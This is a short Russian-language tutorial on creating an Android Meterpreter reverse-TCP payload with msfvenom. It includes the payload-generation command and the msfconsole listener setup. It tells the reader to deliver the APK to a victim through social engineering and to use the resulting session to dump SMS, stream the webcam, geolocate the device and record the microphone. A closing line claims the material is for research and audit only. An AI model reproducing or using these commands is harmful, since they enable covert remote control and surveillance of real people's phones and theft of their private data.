Одним из интересных трюков является обратная сессия tcp android.
Все, что вам нужно, это создать небольшой пэйлоад с помощью msfvenom.
# msfvenom -p android / meterpreter / reverse_tcp LHOST = {ВАШ IP-АДРЕС} LPORT = 4444 R> /root/FILENAME.apk
{ВАШ IP ADDRESS} может быть вашим локальным IP-адресом или публичным IP-адресом.
Если вы хотите использовать общедоступный IP-адрес и взломать WAN, вам необходимо настроить перенаправление портов на маршрутизаторе, который может быть заблокирован вашим интернет-провайдером.
Он будет генерировать приложения для Android.
Вам необходимо доставить это приложение с помощью Социальной инженерии на устройство жертвы.
Перед доставкой начните прослушивать порт 4444:
# msfconsole use exploit/multi/handler set payload android/meterpreter/reverse_tcp set LHOST 192.168.1.123 //local ip set LPORT 4444 exploit
Когда жертва устанавливает этот .apk, ваш сеанс будет запущен в терминале:
Это много интересного, что вы можете сделать с помощью meterpreter, например dump_sms, webcam_stream, geolocate, record mic.
Введите помощь в терминале, и вы увидите что вы можете сделать с этим инструментом.
Примечание: Информация для исследования, обучения или проведения аудита. Применение в корыстных целях карается законодательством РФ.